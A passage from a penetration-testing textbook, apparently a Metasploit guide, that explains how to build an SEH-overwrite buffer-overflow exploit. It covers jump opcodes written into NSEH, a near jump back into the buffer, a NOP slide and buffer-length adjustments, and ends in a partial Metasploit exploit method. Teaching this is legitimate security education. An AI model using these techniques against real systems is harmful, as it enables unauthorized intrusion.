Creating Your Own Exploits
209
When editing your exploit, be sure to adjust the initial buffer length at
as you make changes, or your alignment will be off. In this case, NSEH is being
overwritten with the instructions to make a short five-byte jump backward
(
\xeb\xf9\x90\x90
) , where
eb
is the operation code for a short jump. The
new lead buffer length is adjusted to 10,356 bytes, because these five new
bytes come before the SEH overwrite.
When you run the exploit again and step through the instructions in the
debugger, you should land in the
41
s (hexadecimal
A
s) before the exception
handler values. The five
INC ECX
instructions should be replaced with the
code to jump farther back into the initial buffer.
Now we’ll change the exploit to include the “near jump” (
\xe9\xdd\xd7\
xff\xff
) sequence of instructions, to jump backward to a location near the
beginning of the buffer. Looking at the buffer (Figure 14-6), you can see that
the entire string of
A
s is completely intact, leaving more than 10,000 bytes
available for shellcode. Since the average space required for functional
shellcode is less than 500 bytes, this leaves you ample room.
Figure 14-6: Lots of room for shellcode
Now all you have to do is replace the buffer of
41
s with NOPs (
\x90
) to
give yourself a nice NOP slide to land in, and then you can sit back and let
Metasploit take care of the shellcode.
def exploit
connected = connect_login
lead = "\x90" * (
10351
- payload.encoded.length)
near = "\xe9\xdd\xd7\xff\xff"
nseh = "\xeb\xf9\x90\x90"